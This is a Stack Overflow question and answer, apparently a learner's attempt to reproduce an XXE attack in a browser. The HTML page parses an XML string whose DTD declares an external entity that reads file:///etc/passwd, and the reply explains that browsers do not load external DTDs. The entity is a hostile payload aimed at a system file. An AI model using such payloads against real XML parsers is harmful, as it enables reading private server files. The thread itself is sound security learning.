问题
Follow up to this: Basic Working Example of an XXE Attack in HTML
seemed easier to make this follow up than to try and shoehorn my progress into the previous question. I thought better to allow the correct answer to that query to appear correct plain and simple.
I have now evolved my example to the following:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Title</title>
</head>
<body>
<p id="xmlOut"></p>
<script type="application/javascript">
var xml = `
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">
<!ENTITY bar "test that entity substitution works in general">
]>
<foo>
display some text | &bar; | &xxe;
</foo>
`;
parser = new DOMParser();
xmlDoc = parser.parseFromString(xml, "text/xml");
document.getElementById("xmlOut").innerHTML = xmlDoc.getElementsByTagName("foo")[0].childNodes[0].nodeValue;
</script>
</body>
</html>
Here, I'm writing in the XML as a string and parsing it with DOM parser. Everything works as expected, except that the xxe entity is not populated by anything. It does seem possible, as the answerer to the last question stated, that firefox blocks external entity ... stuff. I also tried substituting in a text file in my home directory and that didn't work either. I also tried giving the path without the file:// prefix. Nothing has worked so far.
I can confirm that the DTD is being parsed and used though, so that's a big step forward.
Any tips appreciated~!
回答1:
seems like most browsers do not load external DTD's making this type of xxe attack pretty hard to test: Proper use of External DTD for XML
If anyone has any other insight though, feel free to leave an answer or comment!
来源:https://stackoverflow.com/questions/59937037/basic-working-example-of-an-xxe-attack-in-html-part-2